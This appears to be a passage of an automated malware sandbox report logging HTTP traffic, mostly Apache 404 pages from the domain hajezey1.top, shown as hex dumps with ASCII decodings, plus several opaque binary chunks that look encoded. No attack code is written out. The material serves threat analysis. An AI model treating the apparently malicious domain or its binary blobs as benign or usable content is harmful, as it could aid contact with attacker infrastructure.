              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:29:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:29:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:29:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 22 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 93 e2 86 38 f8 f3 a4 7c d8 21 bd 40 8f 8c f5 cf 9b 2b 25 9b f6 ba e9 1a b0 1c 67 74 d2 23 9f 87 cd 2b 80 78 51 a1 a2 8f 3c 08 d8 1c e0 32 02 50 08 08 d0 e2 30 a5 59 93 9b b7 4f f3 e0 e6 62 79 04 54 ea d6 d7 0c 3d 61 1f 27 f4 d2 af 34 91 b4 b9 81 8a 20 59 55 11 5c b8 e6 6e ab 49 11 a0 c8 58 4b 67 13 d2 18 5b 47 86 65 39 15 32 29 c5 f7 15 67 aa cf 20 c0 7a 9f 06 a2 7f c1 96 98 8b 36 81 ff cc 8a 40 d8 06 0e 45 87 1b 7d 87 f8 e0 04 89 f9 d4 57 80 90 70 89 ec 30 4d 6b 0e e1 a2 22 48 12 da 49 a1 ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 b2 ec 92 90 0f 1c 57 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 b6 9b 97 96 70 9f 8a 86 e8 47 5a ad b2 cb 99 6c 71 11 87 02 b1 b8 56 b0 40 f6 0a bf 8b 71 91 ce 21 b5 1e 55 df 76 79 d3 e2 5f 96 da 19 d1 3a 2d 6e 44 06 02 25 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 4e 85 8b 51 b0 3e 5b f3 99 84 4a 04 38 2d 77 14 2c d0 e8 b1 14 b9 76 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 54 02 f9 ee f8 b2 d6 4a 1f a7 e9 4d 51 e2 49 64 cd 25 5c 8d b7 73 24 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae a6 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 d8 62 47 42 f5 07 b2 be 34 56 9b 46 76 99 86 11 00 83 32 42 62 6f c9 ae 88 3b 95 36 e1 48 50 67 79 50 b8 81 be e6 81 de e3 75 6d 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 2f bd 44 ef bf 8b 4f dc ea 90 39 02 97 ab a4 57 25 f5 b8 d0 a7 df f2 4a 0b 7d 54 7a 9c 6c 39 c0 a1 0c 5c 19 d6 63 95 be 07 3d da 9a 7e 05 22 7d e6 b2 68 60 b9 10 31 eb cd fc 25 15 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 7b 88 4b 2e 69 81 77 af 5d c6 83 41 69 2f 14 b6 e8 95 19 6d 76 d6 60 83 70 56 3e 0f 60 7c aa 9f 50 54 0c f3 a6 eb 5a ed 33 bd 8a f1 7a 5b b4 18 20 5e 7a 14 f7 f2 26 2b e9 c4 ef 28 e8 98 eb e7 6c ba 25 8f fc da 14 79 a2 8e b9 08 90 bb 77 c6 19 2a 16 bf 43 b3 ea 3d b2 13 3b 35 02 1a 1b eb 22 f5 4e ad e8 16 83 83 6f d4 ed 3f ec c9 81 68 73 02 99 ea fc cd c3 05 d0 93 d3 23 39 01 c4 a5 c8 63 77 da 0b af bd d9 39 69 a1 99 9c 77 e8 0f 4e 8c da 06 b9 37 87 8c b4 26 b8 2c 58 32 77 6c 08 da f9 d2 eb 48 25 66 37 2d 2f f2 5e a5 27 48 84 89 ff 67 37 f9 bd a1 97 2b 86 f3 bd 98 bb 1f 77 c7 26 e1 39 c6 86 8e f0 09 af 63 9d 31 09 a8 50 13 30 7b 32 8c c9 e1 d5 c0 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 f8 3f d8 2c eb 53 43 ae 3b 97 e4 23 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:29:43 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:29:44 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:29:44 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 22 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 93 e2 86 38 f8 f3 a4 7c d8 21 bd 40 8f 8c f5 cf 9b 2b 25 9b f6 ba e9 1a b0 1c 67 74 d2 5f 9f 87 cd 29 80 78 51 a1 a2 8f 4c 3d d8 1c e0 32 02 50 08 e8 df e2 30 a5 59 93 9b b7 4f f3 e0 e6 62 79 04 54 ea d6 d7 0c 3d 61 1f 27 f4 d2 af 34 91 b4 b9 e1 8a 20 59 55 11 5c 03 25 6e ab 49 11 a0 c8 58 4b 67 13 d2 18 5b 47 86 65 39 15 32 29 c5 f7 15 67 aa cf 20 c0 7a 9f 06 a2 7f c1 96 98 8b 36 5d ca cc 8a 44 d8 06 0e 45 67 14 7d 63 fb e0 04 89 f9 d4 57 80 90 70 89 ec 24 4d 6b 0e e1 a2 22 48 32 da 49 a1 ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 b2 ec 92 90 0f 1c 57 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 b6 9b 97 96 70 9f 8a 86 e8 47 5a ad b2 cb 99 6c 71 11 87 02 b1 b8 56 b0 40 f6 0a bf 8b 71 91 ce 21 b5 1e 55 df 76 79 83 97 5f 96 da 19 d1 3a 2d 12 44 06 02 25 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 4e 85 8b 51 b0 3e 5b f3 7d 87 4a 04 38 cd 78 14 2c de e8 b1 14 c5 76 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 54 02 f9 ee f8 b2 d6 4a 1f a7 e9 4d 51 c2 49 64 cd 25 5c 8d b7 1d 24 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae a6 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 d8 62 47 42 a5 32 b2 be 34 56 9b 46 76 99 86 11 00 83 32 42 62 6e c9 ae d4 15 95 36 e1 48 50 67 7e 50 b8 81 be e5 81 de e3 75 6d 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 2f bd 44 ef bf 8b 4f dc ea 90 39 02 97 ab a4 57 25 f5 b8 d0 a7 df f2 4a 0b 7d 54 7a 9c 6c 39 c0 a1 0c 5c 19 d6 63 95 be 07 3d da 9a 7e 05 22 7d e6 b2 68 60 b9 10 31 eb cd fc 25 15 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 7b 88 4b 2e 69 81 77 af 5d c6 83 41 69 2f 14 b6 e8 95 19 6d 76 d6 60 83 70 56 3e 0f 60 7c aa 9f 50 54 0c f3 a6 eb 5a ed 33 bd 8a f1 7a 5b b4 18 20 5e 7a 14 f7 f2 26 2b e9 c4 ef 28 e8 98 eb e7 6c ba 25 8f fc da 14 79 a2 8e b9 08 90 bb 77 c6 19 2a 16 bf 43 b3 ea 3d b2 13 3b 35 02 1a 1b eb 22 f5 4e ad e8 16 83 83 6f d4 ed 3f ec c9 81 68 73 02 99 ea fc cd c3 05 d0 93 d3 23 39 01 c4 a5 c8 63 77 da 0b af bd d9 39 69 a1 99 9c 77 e8 0f 4e 8c da 06 b9 37 87 8c b4 26 b8 2c 58 32 77 6c 08 da f9 d2 eb 48 25 66 37 2d 2f f2 5e a5 27 48 84 89 ff 67 37 f9 bd a1 97 2b 86 f3 bd 98 bb 1f 77 c7 26 e1 39 c6 86 8e f0 09 af 63 9d 31 09 a8 50 13 30 7b 32 8c c9 e1 d5 c0 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 f8 3f d8 2c eb 53 43 ae 3b 97 e4 23 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:29:46 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:29:47 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 52 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b c3 a7 86 38 b4 f2 a7 7c 2d f0 3a cb 8f 8c f5 cf 9b 2b 25 9b 16 ba eb 1b bb 1d 57 74 d2 eb 98 87 cd 23 80 78 51 a1 a2 8f d2 ee df 1c e0 12 02 50 08 08 d8 e2 30 a5 19 93 9b 97 4f f3 e0 e4 62 79 00 54 ea d6 d7 0c 3d 61 19 27 f4 d2 af 34 91 b4 b9 c1 82 20 59 57 11 5c 7c 3b 66 ab 4b 11 c0 4d 58 4b 77 13 d2 08 5b 47 86 65 29 15 32 39 c5 f7 45 22 aa cf 7c c1 7f 9f fc b7 a8 9f 96 98 8b 36 19 19 cb 8a f3 d8 05 0f 4e 86 19 7d 6f ab e1 04 89 63 7a 55 80 90 70 89 7f c8 4a 6b b6 e2 a2 22 48 42 d3 49 ad ff fc ff 1f ed f5 3f f4 6d d3 7c ce 36 d3 ce 4e 49 b3 0b 5e 4c 64 55 5b ad 30 7a 83 9b 84 c8 c3 e7 b2 ec 1c e1 0c 1c 55 ee 87 fe 0c 35 9a 3d 50 6f d0 56 81 96 8b 97 9e 60 9f 8a 86 e8 47 5a bd b2 cb 99 64 51 11 87 4a b1 b8 56 ec ef f7 0a 83 8b 71 91 e0 75 7e 64 19 a0 77 79 27 24 58 96 da 39 d1 3a 2d a6 43 06 02 27 47 c2 fa 6b 8a b2 e2 4b 6d ec 00 31 a5 e2 ec d7 d9 e6 60 f7 f8 23 d3 3e 5b f3 71 81 4a 04 38 2d 7f 14 2c d6 e8 b1 14 73 71 10 fa 82 4b 86 07 30 5a 22 a2 3f 0b 8e 2b 51 fd f5 7a 00 9d 82 ef d0 d6 4a 13 a7 e9 4d 51 c2 41 64 cd 27 5c 8d b7 a3 23 0c 26 17 51 d2 eb e9 23 19 b3 32 59 08 42 41 ae e4 36 dd 3f 9d 43 cd 17 fe 2f 15 9f f8 d8 66 47 42 25 e1 b5 be 34 56 9b 46 3e 99 86 11 22 83 37 22 ec 68 aa cf 04 2a 95 36 56 0f 50 67 74 20 b9 87 f6 f4 81 de bb 34 6b 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ac f8 b9 1f 3a 48 93 92 4e bd 44 ef fb c9 e3 de ea 50 38 02 97 b1 a4 57 25 57 b9 d0 ea 85 62 4a 08 7d 54 7a 98 6c 39 c0 1e f3 5c d9 40 00 fc ce 6e 47 b3 9a 4c 07 22 7d e6 a2 c6 62 b9 14 31 eb cd 40 24 15 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 3b 88 4b 6e 47 f3 04 dd be c6 83 41 5f 4f af b8 e8 01 be a2 57 ee 60 87 bd b7 6b 67 09 0f 8a ef 22 3b 6b 81 c7 86 7a 8e 12 d3 e4 de 0e 7b d6 7d 00 2c 0f 7a d7 9b 48 0b ad 8b bc 08 85 f7 8f 82 42 b7 28 85 d8 da 14 79 a2 8e b9 08 c0 fe 77 c6 1d 2b 15 bf fa a5 e9 a8 b2 13 3b 35 02 1a 1b eb c2 f5 6c 8d e3 17 d3 83 6f ce ed 3f ec cf 81 68 73 02 99 ea a6 f5 c3 05 d0 b3 d3 23 39 41 c4 a5 c8 63 77 ca 0b 8f bd d9 39 6b a1 99 98 77 e8 0f 4e 8c da 06 bd 37 87 8c b4 26 b8 2c 58 b2 77 6c 08 d8 f9 d2 eb 48 25 66 34 2d 6f 77 5e a5 37 48 84 99 ff 67 37 f9 ad a1 97 3b 86 f3 bd 98 bb 1f 67 c7 26 e1 39 c6 86 8e f0 09 af 63 95 09 09 a8 1f 13 30 7b 32 cc c9 e1 ad c3 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 98 3f d8 2c eb 53 43 a0 0c 97 e4 22 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:29:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
